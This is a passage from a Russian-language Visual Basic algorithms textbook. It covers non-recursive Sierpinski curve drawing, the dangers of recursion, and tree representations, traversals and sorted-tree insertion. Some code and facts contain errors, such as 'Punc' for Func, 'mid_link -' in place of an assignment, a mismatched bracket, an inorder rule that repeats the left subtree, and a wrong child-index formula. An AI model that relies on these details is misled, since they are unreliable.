Время выполнения этого алгоритма может быть нелегко оценить непосредственно. Поскольку методы преобразования рекурсивных процедур в нерекурсивные не изменяют время выполнения алгоритма, эта процедура так же, как и предыдущая версия, имеет время выполнения порядка O(N4).
Программа Hilbert2 демонстрирует нерекурсивный алгоритм построения кривых Гильберта. Задавайте вначале построение несложных кривых (меньше 6 порядка), пока не узнаете, насколько быстро будет выполняться эта программа на вашем компьютере.
Нерекурсивное построение кривых Серпинского
Приведенный ранее алгоритм построения кривых Серпинского включает в себя косвенную и множественную рекурсию. Так как алгоритм состоит из четырех подпрограмм, которые вызывают друг друга, то нельзя просто пронумеровать важные строки, как это можно было сделать в случае алгоритма построения кривых Гильберта. С этой проблемой можно справиться, слегка изменив алгоритм.
Рекурсивная версия этого алгоритма состоит из четырех подпрограмм SierpA, SierpB, SierpC и SierpD. Подпрограмма SierpA выглядит так:
Private Sub SierpA(Depth As Integer, Dist As Single)
If Depth = 1 Then
Line -Step(-Dist, Dist)
Line -Step(-Dist, 0)
Line -Step(-Dist, -Dist)
Else
SierpA Depth - 1, Dist
Line -Step(-Dist, Dist)
SierpB Depth - 1, Dist
Line -Step(-Dist, 0)
SierpD Depth - 1, Dist
Line -Step(-Dist, -Dist)
SierpA Depth - 1, Dist
End If
End Sub
Три другие процедуры аналогичны. Несложно объединить эти четыре процедуры в одну подпрограмму.
Private Sub SierpAll(Depth As Integer, Dist As Single, Func As Integer)
Select Case Punc
Case 1 ' SierpA
<код SierpA code>
Case 2 ' SierpB
<код SierpB>
Case 3 ' SierpC
<код SierpC>
Case 4 ' SierpD
<код SierpD>
End Select
End Sub
======112
Параметр Func сообщает подпрограмме, какой блок кода выполнять. Вызовы подпрограмм заменяются на вызовы процедуры SierpAll с соответствующим значением Func. Например, вызов подпрограммы SierpA заменяется на вызов процедуры SierpAll с параметром Func, равным 1. Таким же образом заменяются вызовы подпрограмм SierpB, SierpC и SierpD.
Полученная процедура рекурсивно вызывает себя в 16 различных точках. Эта процедура намного сложнее, чем процедура Hilbert, но в других отношениях она имеет такую же структуру и поэтому к ней можно применить те же методы устранения рекурсии.
Можно использовать первую цифру меток pc, для определения номера блока кода, который должен выполняться. Перенумеруем строки в коде SierpA числами 11, 12, 13 и т.д. Перенумеруем строки в коде SierpB числами 21, 22, 23 и т.д.
Теперь можно пронумеровать ключевые строки кода внутри каждого из блоков. Для кода подпрограммы SierpA ключевыми строками будут:
' Код SierpA.
11 If Depth = 1 Then
Line -Step(-Dist, Dist)
Line -Step(-Dist, 0)
Line -Step(-Dist, -Dist)
Else
SierpA Depth - 1, Dist
12 Line -Step(-Dist, Dist)
SierpB Depth - 1, Dist
13 Line -Step(-Dist, 0)
SierpD Depth - 1, Dist
14 Line -Step(-Dist, -Dist)
SierpA Depth - 1, Dist
End If
Типичная «рекурсия» из кода подпрограммы SierpA в код подпрограммы SierpB выглядит так:
SaveValues Depth, 13 ' Продолжить с шага 13 после завершения.
Depth = Depth - 1
pc = 21 ' Передать управление на начало кода SierpB.
======113
Метка 0 зарезервирована для обозначения выхода из «рекурсии». Следующий код демонстрирует нерекурсивную версию процедуры SierpAll. Код для подпрограмм SierpB, SierpC, и SierpD аналогичен коду для SierpA, поэтому он опущен.
Private Sub SierpAll(Depth As Integer, pc As Integer)
Do
Select Case pc
' **********
' * SierpA *
' **********
Case 11
If Depth <= 1 Then
SierpPicture.Line -Step(-Dist, Dist)
SierpPicture.Line -Step(-Dist, 0)
SierpPicture.Line -Step(-Dist, -Dist)
pc = 0
Else
SaveValues Depth, 12 ' Выполнить SierpA
Depth = Depth - 1
pc = 11
End If
Case 12
SierpPicture.Line -Step(-Dist, Dist)
SaveValues Depth, 13 ' Выполнить SierpB
Depth = Depth - 1
pc = 21
Case 13
SierpPicture.Line -Step(-Dist, 0)
SaveValues Depth, 14 ' Выполнить SierpD
Depth = Depth - 1
pc = 41
Case 14
SierpPicture.Line -Step(-Dist, -Dist)
SaveValues Depth, 0 ' Выполнить SierpA
Depth = Depth - 1
pc = 11
' Код для SierpB, SierpC и SierpD опущен.
:
' *******************
' * Конец рекурсии. *
' *******************
Case 0
If TopOfStack <= 0 Then Exit Do
RestoreValues Depth, pc
End Select
Loop
End Sub
=====114
Так же, как и в случае с алгоритмом построения кривых Гильберта, преобразование алгоритма построения кривых Серпинского в нерекурсивную форму не изменяет время выполнения алгоритма. Новая версия алгоритма имитирует рекурсивный алгоритм, который выполняется за время порядка O(N4), поэтому порядок времени выполнения новой версии также составляет O(N4). Она выполняется немного медленнее, чем рекурсивная версия, и является намного более сложной.
Нерекурсивная версия также могла бы рисовать кривые более высоких порядков, но построение кривых Серпинского с порядком выше 8 или 9 непрактично. Все эти факты определяют преимущество рекурсивного алгоритма.
Программа Sierp2 использует этот нерекурсивный алгоритм для построения кривых Серпинского. Задавайте вначале построение несложных кривых (меньше 6 порядка), пока не определите, насколько быстро будет выполняться эта программа на вашем компьютере.
Резюме
При применении рекурсивных алгоритмов следует избегать трех основных опасностей:
Бесконечной рекурсии. Убедитесь, что условия остановки вашего алгоритма прекращают все рекурсивные пути.
Глубокой рекурсии. Если алгоритм достигает слишком большой глубины рекурсии, он может привести к переполнению стека. Минимизируйте использование стека за счет уменьшения числа определяемых в процедуре переменных, использования глобальных переменных, или определения переменных как статических. Если процедура все равно приводит к переполнению стека, перепишите алгоритм в нерекурсивном виде, используя устранение хвостовой рекурсии.
Ненужной рекурсии. Обычно это происходит, если алгоритм типа рекурсивного вычисления чисел Фибоначчи, многократно вычисляет одни и те же промежуточные значения. Если вы столкнетесь с этой проблемой в своей программе, попробуйте переписать алгоритм, используя подход снизу вверх. Если алгоритм не позволяет прибегнуть к подходу снизу вверх, создайте таблицу промежуточных значений.
Применение рекурсии не всегда неправильно. Многие задачи являются рекурсивными по своей природе. В этих случаях рекурсивный алгоритм будет проще понять, отлаживать и поддерживать, чем его нерекурсивную версию. В качестве примера можно привести алгоритмы построения кривых Гильберта и Серпинского. Оба по своей природе рекурсивны и намного понятнее, чем их нерекурсивные модификации. При этом рекурсивные версии даже выполняются немного быстрее.
Если у вас есть алгоритм, который рекурсивен по своей природе, но вы не уверены, будет ли рекурсивная версия лишена проблем, запишите алгоритм в рекурсивном виде и выясните это. Может быть, проблемы не возникнут. Если же они возникнут, то, возможно, окажется проще преобразовать эту рекурсивную версию в нерекурсивную, чем написать нерекурсивную версию с нуля.
======115
Глава 6. Деревья
Во 2 главе приводились способы создания динамических связных структур, таких, как изображенные на рис 6.1. Такие структуры данных называются графами (graphs). В 12 главе алгоритмы работы с графами и сетями обсуждаются более подробно. В этой главе рассматриваются графы особого типа, которые называются деревьями (trees).
В начале этой главы приводится определение дерева и разъясняются некоторые термины. Затем в ней описываются некоторые методы реализации деревьев различных типов на языке Visual Basic. В последующих разделах рассматривается несколько алгоритмов обхода для деревьев, записанных в этих разных форматах. Глава заканчивается обсуждением некоторых специальных типов деревьев, включая упорядоченные деревья (sorted trees), деревья со ссылками(threaded trees), боры (tries) и квадродеревья (quadtrees).
В 7 и 8 главе обсуждаются более сложные темы — сбалансированные деревья и деревья решений.
@Рис. 6.1. Графы
=====117
Определения
Можно рекурсивно определить дерево как:
Пустую структуру или
Узел, называемый корнем (node) дерева, связанный с нулем или более поддеревьев (subtrees).
На рис. 6.2 показано дерево. Корневой узел A связан с тремя поддеревьями, начинающимися в узлах B, C и D. Эти узлы связаны с поддеревьями с корнями E, F и G, и эти узлы, в свою очередь связаны с поддеревьями с корнями H, I и J.
Терминология деревьев представляет собой смесь терминов, позаимствованных из ботаники и генеалогии. Из ботаники пришли термины, такие как узел (node), определяемый как точка, в которой может начинаться ветвление, ветвь (branch), определяемая как связь между двумя узлами, и лист (leaf) — узел, из которого не выходят другие ветви.
Из генеалогии пришли термины, которые описывают родство. Если один узел находится непосредственно над другим, верхний узел называется родителем (parent), а нижний дочерним узлом (child). Узлы на пути вверх от узла до корня называются предками (ancestors) узла. Например, на рис. 6.2 узлы E, B и A — это все предки узла I.
Узлы, которые находятся ниже какоголибо узла дерева, называются потомками (descendants) этого узла. Узлы E, H, I и J на рис. 6.2 — это все потомки узла B.
Иногда узлы, имеющие одного родителя, называются узламибратьями или узламисестрами (sibling nodes).
Существует еще несколько терминов, которые не пришли из ботаники или генеалогии. Внутренним узлом (internal node) называется узел, который не является листом. Порядком узла (node degree) называется число его дочерних узлов. Порядок дерева — это наибольший порядок его узлов. Дерево на рис. 6.2 — третьего порядка, потому что узлы с наибольшим порядком, узлы A и E, имеют по 3 дочерних узла.
Глубина (depth) дерева равна числу его предков плюс 1. На рис. 6.2 глубина узла E равна 3. Глубиной (depth) или высотой (height) дерева называется наибольшая глубина его узлов. Глубина дерева на рис. 6.2 равна 4.
Дерево 2 порядка называется двоичным деревом (binary tree). Деревья третьего порядка иногда называются троичными (ternary) деревьями. Более того, деревья порядка N иногда называются Nичными (Nary) деревьями.
@Рис. 6.2. Дерево
======118
Дерево порядка 12, например, называется 12ричным (12ary) деревом, а не додекадеричным (dodecadary) деревом. Некоторые избегают употребления лишних терминов и просто говорят «деревья 12 порядка».
Рис. 6.3 иллюстрирует некоторые из этих терминов.
Представления деревьев
Теперь, когда вы познакомились с терминологией, вы можете представить себе способы реализации деревьев на языке Visual Basic. Один из способов — создать отдельный класс для каждого типа узлов дерева. Для построения дерева, показанного на рис. 6.3, вы можете определить структуры данных для узлов, которые имеют ноль, один, два или три дочерних узла. Этот подход был бы довольно неудобным. Кроме того, что нужно было бы управлять четырьмя различными классами, в классах потребовались бы какието флаги, которые бы указывали тип дочерних узлов. Алгоритмы, которые оперировали бы этими деревьями, должны были бы уметь работать со всем различными типами деревьев.
Полные узлы
В качестве простого решения можно определить один тип узлов, который содержит достаточное число указателей на потомков для представления всех нужных узлов. Я называю это методом полных узлов, так как некоторые узлы могут быть большего размера, чем необходимо на самом деле.
Дерево, изображенное на рис 6.3, имеет 3 порядок. Для построения этого дерева с использованием метода полных узлов (fat nodes), требуется определить единственный класс, который содержит указатели на три дочерних узла. Следующий код демонстрирует, как эти указатели могут быть определены в классе TernaryNode.
Public LeftChild As TernaryNode
Public MiddleChild As TernaryNode
Public RightChild As TernaryNode
@Рис. 6.3. Части троичного (3 порядка) дерева
======119
При помощи этого класса можно построить дерево, используя записи Child узлов, для связи их друг с другом. Следующий фрагмент кода строит два верхних уровня дерева, показанного на рис. 6.3.
Dim A As New TernaryNode
Dim B As New TernaryNode
Dim C As New TernaryNode
Dim D As New TernaryNode
:
Set A.LeftChild = B
Set A.MiddleChild = C
Set A.RightChild = D
:
Программа Binary, показанная на рис. 6.4, использует метод полных узлов для работы с двоичным деревом. Когда вы выбираете узел с помощью мыши, программа подсвечивает кнопку Add Left (Добавить слева), если узел не имеет левого потомка и кнопку Add Right (Добавить справа), если узел не имеет правого потомка. Кнопка Remove (Удалить) разблокируется, если выбранный узел не является корневым. Если вы нажмете на кнопку Remove, программа удалит узел и всех его потомков.
Поскольку программа позволяет создать узлы с нулевым числом, одним или двумя дочерними узлами, она использует представление в виде полных узлов. Вы можете легко распространить этот пример на деревья более высоких порядков.
Списки потомков
Если порядки узлов в дереве сильно различаются, метод полных узлов приводит к напрасному расходованию большого количества памяти. Чтобы построить дерево, показанное на рис. 6.5 с использованием полных узлов, вам понадобится определить в каждом узле по шесть указателей, хотя только в одном узле все шесть из них используются. Это представление дерева потребует 72 указателей на дочерние узлы, из которых в действительности будет использоваться только 11.
@Рис. 6.4. Программа Binary
======120
Некоторые программы добавляют и удаляют узлы, изменяя порядок узлов в процессе выполнения. В этом случае метод полных узлов не будет работать. Такие динамически изменяющиеся деревья можно представить, поместив дочерние узлы в списки. Есть несколько подходов, которые можно использовать для создания списков дочерних узлов. Наиболее очевидный подход заключается в создании в классе узла открытого (public) массива дочерних узлов, как показано в следующем коде. Тогда для оперирования дочерними узлами можно использовать методы работы со списками на основе массивов.
Public Children() As TreeNode
Public NumChildren As Integer
К сожалению, Visual Basic не позволяет определять открытые массивы в классах. Это ограничение можно обойти, определив массив как закрытый (private), и оперируя элементами массива при помощи процедур свойств.
Private m_Chirdren() As TreeNode
Private m_NumChildren As Integer
Property Get Children(Index As Integer) As TreeNode
Set Children = m_Children(Index)
End Property
Property Get NumChildren() As Integer
NumChildren = m_NumChildren()
End Property
Второй подход состоит в том, чтобы сохранять ссылки на дочерние узлы в связных списках. Каждый узел содержит ссылку на первого потомка. Он также содержит ссылку на следующего потомка на том же уровне дерева. Эти связи образуют связный список узлов одного уровня, поэтому я называю этот метод представлением в виде связного списка узлов одного уровня (linked sibling). За информацией о связных списках вы можете обратиться ко 2 главе.
@Рис. 6.5. Дерево с узлами различных порядков
======121
Третий подход заключается в том, чтобы определить в классе узла открытую коллекцию, которая будет содержать дочерние узлы:
Public Children As New Collection
Это решение позволяет использовать все преимущества коллекций. Программа может при этом легко добавлять и удалять элементы из коллекции, присваивать дочерним узлам ключи, и использовать оператор For Each для выполнения циклов со ссылками на дочерние узлы.
Программа NAry, показанная на рис. 6.6, использует коллекцию дочерних узлов для работы с деревьями порядка N в основном таким же образом, как программа Binary работает с двоичными деревьями. В этой программе, тем не менее, можно добавлять к каждому узлу любое количество потомков.
Для того чтобы избежать чрезмерного усложнения пользовательского интерфейса, программа NAry всегда добавляет новые узлы в конец коллекции дочерних узлов родителя. Вы можете модифицировать эту программу, реализовав вставку дочерних узлов в середину коллекции, но пользовательский интерфейс при этом усложнится.
Представление нумерацией связей
Представление нумерацией связей (forward star), впервые упомянутое в 4 главе, позволяет компактно представить деревья, графы и сети при помощи массива. Для представления дерева нумерацией связей, в массиве FirstLink записывается индекс для первых ветвей, выходящих из каждого узла. В другой массив, ToNode, заносятся узлы, к которым ведет ветвь.
Сигнальная метка в конце массива FirstLink указывает на точку сразу после последнего элемента массива ToNode. Это позволяет легко определить, какие ветви выходят из каждого узла. Ветви, выходящие из узла I, находятся под номерами от FirstLink(I) до FirstLink(I+1)-1. Для вывода связей, выходящих из узла I, можно использовать следующий код:
For link = FirstLink(I) To FirstLink(I + 1) - 1
Print Format$(I) & " -> " & Format$(ToNode(link))
Next link
@Рис. 6.6. Программа Nary
=======123
На рис. 6.7 показано дерево и его представление нумерацией связей. Связи, выходящие из 3 узла (обозначенного буквой D) это связи от FirstLink(3) до FirstLink(4)-1. Значение FirstLink(3) равно 9, а FirstLink(4) = 11, поэтому это связи с номерами 9 и 10. Записи ToNode для этих связей равны ToNode(9) = 10 и ToNode(10) = 11, поэтому узлы 10 и 11 будут дочерними для 3 узла. Это узлы, обозначенные буквами K и L. Это означает, что связи, покидающие узел D, ведут к узлам K и L.
Представление дерева нумерацией связей компактно и основано на массиве, поэтому деревья, представленные таким образом, можно легко считывать из файлов и записывать в файл. Операции для работы с массивами, которые используются при таком представлении, также могут быть быстрее, чем операции, нужные для использования узлов, содержащих коллекции дочерних узлов.
По этим причинам большая часть литературы по сетевым алгоритмам использует представление нумерацией связей. Например, многие статьи, касающиеся вычисления кратчайшего пути, предполагают, что данные находятся в подобном формате. Если вам когдалибо придется изучать эти алгоритмы в журналах, таких как “Management Science” или “Operations Research”, вам необходимо разобраться в этом представлении.
@Рис. 6.7. Дерево и его представление нумерацией связей
=======123
Используя представление нумерацией связей, можно быстро найти связи, выходящие из определенного узла. С другой стороны, очень сложно изменять структуру данных, представленных в таком виде. Чтобы добавить к узлу A на рис. 6.7 еще одного потомка, придется изменить почти все элементы в обоих массивах FirstLink и ToNode. Вопервых, каждый элемент в массиве ToNode нужно сдвинуть на одну позицию вправо, чтобы освободить место под новый элемент. Затем, нужно вставить новую запись в массив ToNode, которая указывает на новый узел. И, наконец, нужно обойти массив ToNode, обновив каждый элемент, чтобы он указывал на новое положение соответствующей записи ToNode. Поскольку все записи в массиве ToNode сдвинулись на одну позицию вправо, чтобы освободить место для новой связи, потребуется добавить единицу ко всем затронутым записям FirstLink.
На рис. 6.8 показано дерево после добавления нового узла. Записи, которые изменились, закрашены серым цветом.
Удаление узла из начала представления нумерацией связей так же сложно, как и вставка узла. Если удаляемый узел имеет потомков, процесс занимает еще больше времени, поскольку придется удалять и все дочерние узлы.
Относительно простой класс с открытой коллекцией дочерних узлов лучше подходит, если нужно часто модифицировать дерево. Обычно проще понимать и отлаживать процедуры, которые оперируют деревьями в этом представлении. С другой стороны, представление нумерацией связей иногда обеспечивает более высокую производительность для сложных алгоритмов работы с деревьями. Оно также являются стандартной структурой данных, обсуждаемой в литературе, поэтому вам следует ознакомиться с ним, если вы хотите продолжить изучение алгоритмов работы с сетями и деревьями.
@Рис. 6.8. Вставка узла в дерево, представленное нумерацией связей
=======124
Программа Fstar использует представление нумерацией связей для работы с деревом, имеющим узлы разного порядка. Она аналогична программе NAry, за исключением того, что она использует представление на основе массива, а не коллекций.
Если вы посмотрите на код программы Fstar, вы увидите, насколько сложно в ней добавлять и удалять узлы. Следующий код демонстрирует удаление узла из дерева.
Sub FreeNodeAndChildren(ByVal parent As Integer, _
ByVal link As Integer, ByVal node As Integer)
' Recursively remove the node's children.
Do While FirstLink(node) < FirstLink(node + 1)
FreeNodeAndChildren node, FirstLink(node), _
ToNode(FirstLink(node))
Loop
' Удалить связь.
RemoveLink parent, link
' Удалить сам узел.
RemoveNode node
End Sub
Sub RemoveLink(node As Integer, link As Integer)
Dim i As Integer
' Обновить записи массива FirstLink.
For i = node + 1 To NumNodes
FirstLink(i) = FirstLink(i) - 1
Next i
' Сдвинуть массив ToNode чтобы заполнить пустую ячейку.
For i = link + 1 To NumLinks - 1
ToNode(i - 1) = ToNode(i)
Next i
' Удалить лишний элемент из ToNode.
NumLinks = NumLinks - 1
If NumLinks > 0 Then ReDim Preserve ToNode(0 To NumLinks - 1)
End Sub
Sub RemoveNode(node As Integer)
Dim i As Integer
' Сдвинуть элементы массива FirstLink, чтобы заполнить
' пустую ячейку.
For i = node + 1 To NumNodes
FirstLink(i - 1) = FirstLink(i)
Next i
' Сдвинуть элементы массива NodeCaption.
For i = node + 1 To NumNodes - 1
NodeCaption(i - 1) = NodeCaption(i)
Next i
' Обновить записи массива ToNode.
For i = 0 To NumLinks - 1
If ToNode(i) >= node Then ToNode(i) = ToNode(i) - 1
Next i
' Удалить лишнюю запись массива FirstLink.
NumNodes = NumNodes - 1
ReDim Preserve FirstLink(0 To NumNodes)
ReDim Preserve NodeCaption(0 To NumNodes - 1)
Unload FStarForm.NodeLabel(NumNodes)
End Sub
Это намного сложнее, чем соответствующий код в программе NAry:
Public Function DeleteDescendant(target As NAryNode) As Boolean
Dim i As Integer
Dim child As NAryNode
' Является ли узел дочерним узлом.
For i = 1 To Children.Count
If Children.Item(i) Is target Then
Children.Remove i
DeleteDescendant = True
Exit Function
End If
Next i
' Если это не дочерний узел, рекурсивно
' проверить остальных потомков.
For Each child In Children
If child.DeleteDescendant(target) Then
DeleteDescendant = True
Exit Function
End If
Next child
End Function
=======125-126
Полные деревья
Полное дерево (complete tree) содержит максимально возможное число узлов на каждом уровне, кроме нижнего. Все узлы на нижнем уровне сдвигаются влево. Например, каждый уровень троичного дерева содержит в точности три дочерних узла, за исключением листьев, и возможно, одного узла на один уровень выше листьев. На рис. 6.9 показаны полные двоичное и троичное деревья.
Полные деревья обладают рядом важных свойств. Вопервых, это кратчайшие деревья, которые могут содержать заданное число узлов. Например, двоичное дерево на рис. 6.9 — одно из самых коротких двоичных деревьев с шестью узлами. Существуют другие двоичные деревья с шестью узлами, но ни одно из них не имеет высоту меньше 3.
Вовторых, если полное дерево порядка D состоит из N узлов, оно будет иметь высоту порядка O(logD(N)) и O(N) листьев. Эти факты имеют большое значение, поскольку многие алгоритмы обходят деревья сверху вниз или в противоположном направлении. Время выполнения алгоритма, выполняющего одно из этих действий, будет порядка O(N).
Чрезвычайно полезное свойство полных деревьев заключается в том, что они могут быть очень компактно записаны в массивах. Если пронумеровать узлы в «естественном» порядке, сверху вниз и слева направо, то можно поместить элементы дерева в массив в этом порядке. На рис. 6.10 показано, как можно записать полное дерево в массиве.
Корень дерева находится в нулевой позиции. Дочерние узлы узла I находятся на позициях 2 * I + 1 и 2 * I + 2. Например, на рис. 6.10, потомки узла в позиции 1 (узла B), находятся в позициях 3 и 4 (узлы D и E).
Легко обобщить это представление на полные деревья более высокого порядка D. Корень дерева также будет находиться в позиции 0. Потомки узла I занимают позиции от D * I + 1 до D * I +(I - 1). Например, в троичном дереве, потомки узла в позиции 2, будут занимать позиции 7, 8 и 9. На рис. 6.11 показано полное троичное дерево и его представление в виде массива.
@Рис. 6.9. Полные деревья
=========127
@Рис. 6.10. Запись полного двоичного дерева в массиве
При использовании этого метода записи дерева в массиве легко и просто получить доступ к потомкам узла. При этом не требуется дополнительной памяти для коллекций дочерних узлов или меток в случае представления нумерацией связей. Чтение и запись дерева в файл сводится просто к сохранению или чтению массива. Поэтому это несомненно лучшее представление дерева для программ, которые сохраняют данные в полных деревьях.
Обход дерева
Последовательное обращение ко всем узлам называется обходом (traversing) дерева. Существует несколько последовательностей обхода узлов двоичного дерева. Три простейших из них — прямой (preorder), симметричный (inorder), и обратный (postorder)обход, описываются простыми рекурсивными алгоритмами. Для каждого заданного узла алгоритмы выполняют следующие действия:
Прямой обход:
Обращение к узлу.
Рекурсивный прямой обход левого поддерева.
Рекурсивный прямой обход правого поддерева.
Симметричный обход:
Рекурсивный симметричный обход левого поддерева.
Обращение к узлу.
Рекурсивный симметричный обход левого поддерева.
Обратный обход:
Рекурсивный обратный обход левого поддерева.
Рекурсивный обратный обход правого поддерева.
Обращение к узлу.
@Рис. 6.11. Запись полного троичного дерева в массиве
=======128
Все три порядка обхода являются примерами обхода в глубину (depthfirst traversal). Обход начинается с прохода вглубь дерева до тех пор, пока алгоритм не достигнет листьев. При возврате из рекурсивного вызова подпрограммы, алгоритм перемещается по дереву в обратном направлении, просматривая пути, которые он пропустил при движении вниз.
Обход в глубину удобно использовать в алгоритмах, которые должны вначале обойти листья. Например, метод ветвей и границ, описанный в 8 главе, как можно быстрее пытается достичь листьев. Он использует результаты, полученные на уровне листьев для уменьшения времени поиска в оставшейся части дерева.
Четвертый метод перебора узлов дерева — это обход в ширину (breadthfirst traversal). Этот метод обращается ко всем узлам на заданном уровне дерева, перед тем, как перейти к более глубоким уровням. Алгоритмы, которые проводят полный поиск по дереву, часто используют обход в ширину. Алгоритм поиска кратчайшего маршрута с установкой меток, описанный в 12 главе, представляет собой обход в ширину, дерева кратчайшего пути в сети.
На рис. 6.12 показано небольшое дерево и порядок, в котором перебираются узлы во время прямого, симметричного и обратного обхода, а также обхода в ширину.
@Рис. 6.12. Обходы дерева
======129
Для деревьев больше, чем 2 порядка, все еще имеет смысл определять прямой, обратный обход, и обход в ширину. Симметричный обход определяется неоднозначно, так как обращение к каждому узлу может происходить после обращения к одному, двум, или трем его потомкам. Например, в троичном дереве, обращение к узлу может происходить после обращения к его первому потомку или после обращения ко второму потомку.
Детали реализации обхода зависят от того, как записано дерево. Для обхода дерева на основе коллекций дочерних узлов, программа должна использовать несколько другой алгоритм, чем для обхода дерева, записанного при помощи нумерации связей.
Особенно просто обходить полные деревья, записанные в массиве. Алгоритм обхода в ширину, который требует дополнительных усилий в других представлениях деревьев, для представлений на основе массива тривиален, так как узлы записаны в таком же порядке.
Следующий код демонстрирует алгоритмы обхода полного двоичного дерева:
Dim NodeLabel() As String ' Запись меток узлов.
Dim NumNodes As Integer
' Инициализация дерева.
:
Private Sub Preorder(node As Integer)
Print NodeLabel (node) ' Узел.
' Первый потомок.
If node * 2 + 1 <= NumNodes Then Preorder node * 2 + 1
' Второй потомок.
If node * 2 + 2 <= NumNodes Then Preorder node * 2 + 2
End Sub
Private Sub Inorder(node As Integer)
' Первый потомок.
If node * 2 + 1 <= NumNodes Then Inorder node * 2 + 1
Print NodeLabel (node) ' Узел.
' Второй потомок.
If node * 2 + 2 <= NumNodes Then Inorder node * 2 + 2
End Sub
Private Sub Postorder(node As Integer)
' Первый потомок.
If node * 2 + 1 <= NumNodes Then Postorder node * 2 + 1
' Второй потомок.
If node * 2 + 2 <= NumNodes Then Postorder node * 2 + 2
Print NodeLabel (node) ' Узел.
End Sub
Private Sub BreadthFirstPrint()
Dim i As Integer
For i = 0 To NumNodes
Print NodeLabel(i)
Next i
End Sub
======130
Программа Trav1 демонстрирует прямой, симметричный и обратный обходы, а также обход в ширину для двоичных деревьев на основе массивов. Введите высоту дерева, и нажмите на кнопку Create Tree (Создать дерево) для создания полного двоичного дерева. Затем нажмите на кнопки Preorder (Прямой обход), Inorder (Симметричный обход), Postorder (Обратный обход) или Breadth-First (Обход в ширину) для того, чтобы увидеть, как происходит обход дерева. На рис. 6.13 показано окно программы, в котором отображается прямой обход дерева 4 порядка.
Прямой и обратный обход для других представлений дерева осуществляется так же просто. Следующий код демонстрирует процедуру прямого обхода для дерева, записанного в формате с нумерацией связей:
Private Sub PreorderPrint(node As Integer)
Dim link As Integer
Print NodeLabel(node)
For link = FirstLink(node) To FirstLink(node + 1) - 1
PreorderPrint ToNode (link)
Next link
End Sub
@Рис. 6.13. Пример прямого обхода дерева в программе Trav1
=======131
Как упоминалось ранее, сложно дать определение симметричного обхода для деревьев больше 2 порядка. Тем не менее, после того, как вы поймете, что имеется в виду под симметричным обходом, реализовать его достаточно просто. Следующий код демонстрирует процедуру симметричного обхода, которая обращается к половине потомков узла (с округлением в большую сторону), затем к самому узлу, а потом — к остальным потомкам.
Private Sub InorderPrint(node As Integer)
Dim mid_link As Integer
Dim link As Integer
' Найти средний дочерний узел.
mid_link - (FirstLink(node + 1) - 1 + FirstLink(node)) \ 2
' Обход первой группы потомков.
For link = FirstLink(node) To mid_link
InorderPrint ToNode(link)
Next link
' Обращение к узлу.
Print NodeLabel(node)
' Обход второй группы потомков.
For link = mid_link + 1 To FirstLink(node + 1) - 1
InorderPrint ToNode(link)
Next link
End Sub
Для полных деревьев, записанных в массиве, узлы уже находятся в порядке обхода в ширину. Поэтому обход в ширину для этих типов деревьев реализуется просто, тогда как для других представлений реализовать его несколько сложнее.
Для обхода деревьев других типов можно использовать очередь для хранения узлов, которые еще не были обойдены. Вначале поместим в очередь корневой узел. После обращения к узлу, он удаляется из начала очереди, а его потомки помещаются в ее конец. Процесс повторяется до тех пор, пока очередь не опустеет. Следующий код демонстрирует процедуру обхода в ширину для дерева, которое использует узлы с коллекциями потомков:
Dim Root As TreeNode
' Инициализация дерева.
:
Private Sub BreadthFirstPrint(}
Dim queue As New Collection ' Очередь на основе коллекций.
Dim node As TreeNode
Dim child As TreeNode
' Начать с корня дерева в очереди.
queue.Add Root
' Многократная обработка первого элемента
' в очереди, пока очередь не опустеет.
Do While queue.Count > 0
node = queue.Item(1)
queue.Remove 1
' Обращение к узлу.
Print NodeLabel(node)
' Поместить в очередь потомков узла.
For Each child In node.Children
queue.Add child
Next child
Loop
End Sub
=====132
Программа Trav2 демонстрирует обход деревьев, использующих коллекции дочерних узлов. Программа является объединением программ Nary, которая оперирует деревьями порядка N, и программы Trav1, которая демонстрирует обходы деревьев.
Выберите узел, и нажмите на кнопку Add Child (Добавить дочерний узел), чтобы добавить к узлу потомка. Нажмите на кнопки Preorder, Inorder, Postorder или Breadth First, чтобы увидеть примеры соответствующих обходов. На рис. 6.14 показана программа Trav2, которая отображает обратный обход.
Упорядоченные деревья
Двоичные деревья часто являются естественным способом представления и обработки данных в компьютерных программах. Поскольку многие компьютерные операции являются двоичными, они естественно преобразуются в операции с двоичными деревьями. Например, можно преобразовать двоичное отношение «меньше» в двоичное дерево. Если использовать внутренние узлы дерева для обозначения того, что «левый потомок меньше правого» вы можете использовать двоичное дерево для записи упорядоченного списка. На рис. 6.15 показано двоичное дерево, содержащее упорядоченный список с числами 1, 2, 4, 6, 7, 9.
@Рис. 6.14. Пример обратного обхода дерева в программе Trav2
======133
@Рис. 6.15. Упорядоченный список: 1, 2, 4, 6, 7, 9.
Добавление элементов
Алгоритм вставки нового элемента в дерево такого типа достаточно прост. Начнем с корневого узла. По очереди сравним значения всех узлов со значением нового элемента. Если значение нового элемента меньше или равно значению узла, перейдем вниз по левой ветви дерева. Если новое значение больше, чем значение узла, перейдем вниз по правой ветви. Когда этот процесс дойдет до листа, элемент помещается в эту точку.
Чтобы поместить значение 8 в дерево, показанное на рис. 6.15, мы начинаем с корня, который имеет значение 4. Поскольку 8 больше, чем 4, переходим по правой ветви к узлу 9. Поскольку 8 меньше 9, переходим затем по левой ветви к узлу 7. Поскольку 8 больше 7, снова пытаемся пойти по правой ветви, но у этого узла нет правого потомка. Поэтому новый элемент вставляется в этой точке, и получается дерево, показанное на рис. 6.16.
Следующий код добавляет новое значение ниже узла в упорядоченном дереве. Программа начинает вставку с корня, вызывая процедуру InsertItem Root, new_value.
Private Sub InsertItem(node As SortNode, new_value As Integer)
Dim child As SortNode
If node Is Nothing Then
' Мы дошли до листа.
' Вставить элемент здесь.
Set node = New SortNode
node.Value = new_value
MaxBox = MaxBox + 1
Load NodeLabel(MaxBox)
Set node.Box = NodeLabel(MaxBox)
With NodeLabel(MaxBox)
.Caption = Format$(new_value)
.Visible = True
End With
ElseIf new_value <= node.Value Then
' Перейти по левой ветви.
Set child = node.LeftChild
InsertItem child, new_value
Set node.LeftChild = child
Else
' Перейти по правой ветви.
Set child = node.RightChild
InsertItem child, new_value
Set node.RightChild = child
End If
End Sub
Когда эта процедура достигает конца дерева, происходит нечто совсем неочевидное. В Visual Basic, когда вы передаете параметр подпрограмме, этот параметр передается по ссылке, если вы не используете зарезервированное слово ByVal. Это означает, что подпрограмма работает с той же копией параметра, которую использует вызывающая процедура. Если подпрограмма изменяет значение параметра, значение в вызывающей процедуре также изменяется.
